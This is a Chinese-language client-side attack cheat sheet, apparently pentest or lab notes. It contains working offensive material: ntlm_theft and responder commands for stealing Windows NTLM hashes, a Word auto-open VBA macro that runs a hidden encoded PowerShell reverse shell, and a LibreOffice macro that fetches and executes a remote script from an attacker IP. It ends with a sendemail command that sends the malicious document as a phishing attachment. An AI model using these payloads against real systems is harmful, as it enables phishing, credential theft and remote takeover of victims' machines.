跳转至

客户端攻击

文档信息提取

Bash
# 通过 exiftool 工具提取文档隐藏的基础信息
exiftool 2020-01-01-upload.pdf

窃取 Windows NET-NTML

Bash
1
2
3
4
5
6
7
# 通过 ntlm_theft 生成恶意获取 Windows NET-NTM 文件
# download:https://github.com/Greenwolf/ntlm_theft
# -g all 指生成所有类型文件,-s IP 指定攻击者 IP -f 指定生成的目录名
python3 ntlm_theft.py -g all -s 10.10.16.12 -f f0ne

# 通过 responder 监听接收 Windows NET-NTML
sudo responder -I tun0

Office 客户端攻击

Bash
# 宏代码模版,其中的 str 为 powershell 反弹 shell 代码
# 注意:Office 宏代码字符串不能太长
# 需要将大字符串分割组合

Sub AutoOpen()
  MyMacro
End Sub
Sub Document_Open()
  MyMacro
End Sub
Sub MyMacro()
  Dim Str As String
  Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
  Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
  Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
  ...
  Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
  CreateObject("Wscript.Shell").Run Str
End Sub


# 可通过 Python 执行分割
strs = "powershell.exe -nop -w hidden -e =="
n = 50
for i in range(0, len(strs), n):
    print("Str = Str + " + '"' + strs[i:i+n] + '"')

# 之后在 word 文档中新建宏
# 注意:一定要选择在当前文档新建宏
# 其次:示例代码函数名为 MyMacro,如果完全照搬,新建的宏名称需要为 MyMacro
# 其次:保存的文件名称可以为:docm 或 doc

LibreOffice 客户端攻击

Bash
1
2
3
4
5
6
7
# LibreOffice 添加宏代码
# 注意:新建宏选择当前文档
# 其次:设置打开文档运行指定的宏代码

Sub Main
    Shell("cmd /c powershell iex (New-Object Net.Webclient).Downloadstring('http://192.168.45.236:8000/revs.ps1')")
End Sub

钓鱼邮件

Bash
sendemail -f 'Jonas@localhost' -t 'admin@localhost' -s 192.168.170.140:25 -u 'test' -m 'testoffice' -a shell.odt